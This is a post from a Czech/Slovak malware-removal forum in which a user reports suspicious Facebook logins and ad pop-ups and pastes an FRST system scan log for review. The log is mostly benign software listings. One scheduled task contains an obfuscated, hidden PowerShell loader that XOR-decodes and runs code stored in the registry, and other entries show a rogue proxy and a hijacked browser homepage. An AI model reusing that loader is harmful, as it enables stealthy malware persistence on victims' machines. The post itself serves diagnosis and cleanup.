VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

Prihlasovanie do FB, otvaranie okien v browseri

https://forum.viry.cz:443/viewtopic.php?t=159367

Stránka 1 z 1

Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 23 lis 2023 21:07
od mivefe5888
Zdravim, mam taky problem ze mi FB uz 2 krat dal upozornenie o prihlaseni, s tym ze som hned zmenil heslo a aj tak to po pol hodine prislo znova, tak isto sa mi raz otvorilo v browseri nejake okno z reklamou, poprosil by som o kontrolu

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-11-2023 02
Ran by John (administrator) on JOHN-PC (23-11-2023 19:43:41)
Running from C:\Users\John\Downloads\FRST64.exe
Loaded Profiles: John
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(C:\Program Files (x86)\Opera\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\95.0.4635.90\opera_crashreporter.exe
(C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(C:\Program Files\Sublime Text 3\sublime_text.exe ->) (Sublime HQ Pty Ltd -> ) C:\Program Files\Sublime Text 3\plugin_host.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\John\AppData\Local\Discord\app-1.0.9024\Discord.exe <6>
(explorer.exe ->) () [File not signed] I:\stahovanie\gammy_v0.9.64\gammy.exe
(explorer.exe ->) (Figma, Inc. -> ) C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <47>
(explorer.exe ->) (Johannes Millan) [File not signed] [File is in use] I:\stahovanie\superProductivity-7.12.0.exe
(explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\calc.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(explorer.exe ->) (Sublime HQ Pty Ltd -> Sublime HQ Pty Ltd) C:\Program Files\Sublime Text 3\sublime_text.exe
(explorer.exe ->) (TeamSpeak Systems GmbH -> TeamSpeak Systems GmbH) C:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe
(explorer.exe ->) (Vincent Burel -> VB-AUDIO Software) C:\Program Files (x86)\VB\Voicemeeter\voicemeeterpro.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler64.exe
(I:\stahovanie\superProductivity-7.12.0.exe ->) (Johannes Millan) [File not signed] C:\Users\John\AppData\Local\Temp\2EDNJDl4YnJmwr5naxHqvVY7EUJ\superProductivity.exe <4>
(Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\opera.exe <54>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(services.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SolidWorks) [File not signed] C:\Program Files (x86)\Common Files\SOLIDWORKS Shared\Service\SolidWorksLicensing.exe
(services.exe ->) (South River Technologies -> South River Technologies, Inc.) C:\Program Files\WebDrive\wdService.exe
(services.exe ->) (Synology Inc. -> ) C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Tonalio GmbH -> Sandboxie-Plus.com) D:\windows programy\Sandboxie-Plus\SbieSvc.exe
(services.exe ->) (Trace Software International -> ) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe
(services.exe ->) (VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [Figma Agent] => C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe [6795040 2023-10-31] (Figma, Inc. -> )
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe [70912472 2023-11-16] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG3000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDG.DLL [30720 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Windows x64\Print Processors\Canon TS3300 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDG3.DLL [482816 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3000 series: C:\Windows\system32\CNMLMDG.DLL [485376 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3300 series: C:\Windows\system32\CNMLMG3.DLL [1311232 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON WF-2870 Series 64MonitorBE: C:\Windows\system32\E_YLMBXVE.DLL [187392 2018-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\HP 1853 Status Monitor: C:\Windows\system32\hpinksts1853LM.dll [467464 2019-11-28] (HP Inc -> HP Inc.)
HKLM\...\Print\Monitors\HP Discovery Port Monitor (HP DeskJet 2700 series): C:\Windows\system32\HPDiscoPM1853.dll [996512 2022-01-25] (HP Inc. -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\Installer\chrmstp.exe [2023-03-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{BC455173-F501-4356-804F-571FAFB6EA9A}] -> RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\Installer\chrmstp.exe [2020-11-24] (Avast Software s.r.o. -> AVAST Software)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {41D08211-8A07-4B1A-948A-B4B8BF58632A} - System32\Tasks\Robotka
Task: {AAAA1BA0-9973-47D1-B128-DD3F1CC9DEF6} - System32\Tasks\Motivacia
Task: {483F605F-4ACC-438C-A6BA-C7E06893DE4E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {E064BC14-AB10-4997-B691-1589F21C0F1F} - System32\Tasks\AdobeAAMUpdater-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {A44084B5-2748-4011-95F6-DAF5403D9398} - System32\Tasks\AdobeGCInvoker-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {C826FD7A-B8B6-40D8-A041-2076C47165CA} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [4621920 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
Task: {B6215906-8048-45F1-AC2E-0D0F74C0649A} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {C2B756A2-8142-4B50-B9C0-C715DB45B991} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {0A9D12E3-3DCF-40E3-80B9-803013CD2C22} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (No File)
Task: {9D6C3930-F621-4296-A748-5865083AD527} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1741416 2020-09-22] (Avast Software s.r.o. -> Avast Software)
Task: {4D82607E-7526-4BF6-9F28-C3328EC91A74} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {6B681D84-73C0-42F0-816A-FAC346025961} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {E82B4641-76E0-465D-875B-7C8D9733E5FD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-06] (Piriform Ltd -> Piriform Ltd)
Task: {8B006428-2138-449F-8FEF-00FD52F474FC} - System32\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {89F2385D-C566-491E-8211-929329243711} - System32\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {6CA9BD1E-E93C-4F62-A79E-4BC1371F6109} - System32\Tasks\HPCustParticipation HP DeskJet 2700 series => C:\Program Files\HP\HP DeskJet 2700 series\Bin\HPCustPartic.exe [6732960 2022-01-25] (HP Inc. -> HP Inc.)
Task: {454DE0F3-8EFA-4669-8D0B-C409CA75EFF0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {9254C62C-104D-473C-BB40-833CC10AD75B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {571EEDE0-9D34-4AC1-9B1F-AD573C6CAC52} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {5D6BF89C-14FD-4209-BEDE-8D6B54312C30} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
Task: {75A225D9-05D2-41D3-89C6-7C86CBC51CBE} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KE4x9F5p\4F379EE4-AF11-4D1B-8863-5E5A969FD790 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation) -> -WINdowstyLE hiDDEN -comMAnD "icm ([sCripTBlOCk]::creatE([sTRInG]::JoIN('', ((get-ITEmpRoPerty -PATh 'Hklm:\soFtware\GhiSlerkE4X9').'ke4X9F5' | % { [CHar]($_ -bXOr 128) }))))"
Task: {E296B281-E679-4FF5-9072-68B6B9295C53} - System32\Tasks\Microsoft\Windows\RestartManager\{369FD764-7CF1-4ad7-B1C9-2445F4CAF599} => C:\Windows\system32\rmclient.exe [16896 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {999F29AA-219C-4D8B-8489-FC171F033440} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [765888 2023-04-18] (Mozilla Corporation -> Mozilla Foundation)
Task: {47F65D7C-3405-49BE-9CB4-34FDE0AF233D} - System32\Tasks\Opera scheduled Autoupdate 1473525916 => C:\Program Files (x86)\Opera\launcher.exe [1977760 2023-10-30] (Opera Norway AS -> Opera Software)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{E68B163E-C7D5-4EDD-9994-7FE352488197} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{F36A92EA-C9F5-4280-9BE4-615524B64A59} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-949114339-2066100574-2594248327-1000] => 178.32.129.31:3128
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{54287F57-F62E-4A77-887F-98CFD53339ED}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B1477436-BDB7-43DB-8368-4FEBFCEBABA8}: [DhcpNameServer] 192.168.0.1

Edge:
=======
Edge Profile: C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default [2023-09-05]
Edge Extension: (Edge relevant text changes) - C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-05]

FireFox:
========
FF DefaultProfile: vtnva5hp.default
FF DefaultProfile: dpdx1dpi.default
FF DefaultProfile: 39pruj5d.default
FF DefaultProfile: 5fn2593k.default
FF ProfilePath: C:\Users\John\AppData\Roaming\Zotero\Zotero\Profiles\vtnva5hp.default [2023-04-16]
FF ProfilePath: C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default [2019-07-14]
FF NetworkProxy: old Mozilla\Firefox\Profiles\dpdx1dpi.default -> backup.ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\@flash_debugger.xpi [2019-07-14]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\sp@avast.com.xpi [2019-01-23]
FF Extension: (Avast Online Security) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\wrc@avast.com.xpi [2018-07-17]
FF Extension: (Video DownloadHelper) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2018-07-22]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default [2019-07-14]
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default\Extensions\@flash_debugger.xpi [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\39pruj5d.default [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\ly01ikd2.default-release [2023-07-30]
FF NetworkProxy: Mozilla\Firefox\Profiles\ly01ikd2.default-release -> backup.ftp", "89.221.223.204"
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\5fn2593k.default [2021-06-06]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default [2021-06-09]
FF NetworkProxy: Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default -> ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default\Extensions\@flash_debugger [2017-04-12] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2023-03-08] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/DTPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\dtplugin\npDeployJava1.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\plugin2\npjp2.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
StartMenuInternet: Firefox-CA9422711AE1A81C - C:\Program Files\Firefox Developer Edition\firefox.exe

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default [2023-11-23]
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3321897&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SPDDB91BBD-BA11-4584-980A-F18600097BBE&SSPV=
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3321897&octid ... oogle.com/"
CHR Extension: (Ban Checker for Steam) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\canbadmphamemnmdfngmcabnjmjgaiki [2023-10-12]
CHR Extension: (CSS Used) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cdopjfddjlonogibjahpnmjpoangjfff [2023-04-17]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2023-11-12]
CHR Extension: (Steam Inventory Helper) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2023-11-22]
CHR Extension: (Avast Online Security & Privacy (BETA)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2023-01-19]
CHR Extension: (BuiltWith Technology Profiler) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dapjbgnjinbpoindlpdmhochffioedbn [2022-05-12]
CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-06-12]
CHR Extension: (Session Buddy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2023-11-12]
CHR Extension: (Zotero Connector) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2023-10-02]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2023-04-30]
CHR Extension: (DarkOrbit SID Login) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgkcmijdllamjcbfeeheebbphpnbmbco [2019-07-01]
CHR Extension: (Video Downloader PLUS) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2020-09-29]
CHR Extension: (Word Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiombgjlkfpdpkbhfioofeeinbehmajg [2021-05-13]
CHR Extension: (Bad Connection Simulator) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gflankmgolakfdeiponkgmbhbhpdmjlg [2023-10-17]
CHR Extension: (Google Docs Offline) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-06-01]
CHR Extension: (Avast Online Security & Privacy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2023-01-17]
CHR Extension: (Multi Session Box - Multi login any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\hojmmbfmaddjdkkcgbiipkphdcfmkhge [2021-09-04]
CHR Extension: (Stream Video Downloader) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-14]
CHR Extension: (Unseen for Facebook) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2021-01-08]
CHR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2023-07-30]
CHR Extension: (Chromebook Recovery Utility) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jndclpdbaamdhonoechobihbbiimdgai [2022-06-02]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-01-26]
CHR Extension: (WebChatGPT: ChatGPT with internet access) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfemeioodjbpieminkklglpmhlngfcn [2023-11-23]
CHR Extension: (PowerPoint Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-03-24]
CHR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-19]
CHR Extension: (Twitch Now) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmbdmpjmlijibeockamioakdpmhjnpk [2021-06-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Font Changer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\obgkjikcnonokgaiablbenkgjcdbknna [2023-06-06]
